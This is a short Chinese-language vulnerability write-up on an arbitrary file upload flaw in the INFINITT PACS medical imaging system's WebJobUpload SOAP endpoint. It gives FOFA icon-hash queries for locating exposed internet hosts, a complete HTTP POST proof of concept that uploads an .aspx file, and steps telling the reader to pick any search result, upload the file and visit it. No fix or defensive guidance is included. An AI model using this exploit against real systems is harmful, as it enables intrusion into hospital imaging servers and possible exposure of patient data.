漏洞描述:
英飞达是一家专业开发医学影像系统的公司,成立于1994年.英飞达影像存档与通讯PACS系统INFINITT_PACS_WebJobUpload存在任意文件上传漏洞.
fofa语法:
(icon_hash="1474455751" || icon_hash="702238928")
poc:
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 407
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"
Connection: close
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>123</vcode>
<subFolder></subFolder>
<fileName>test.aspx</fileName>
<bufValue>NjY2</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>
漏洞复现:
打开fofa输入语法搜索(icon_hash="1474455751"|| icon_hash="702238928")
随意进去一个,上传成功之后会在响应包里返回路径
访问刚才上传的文件
成功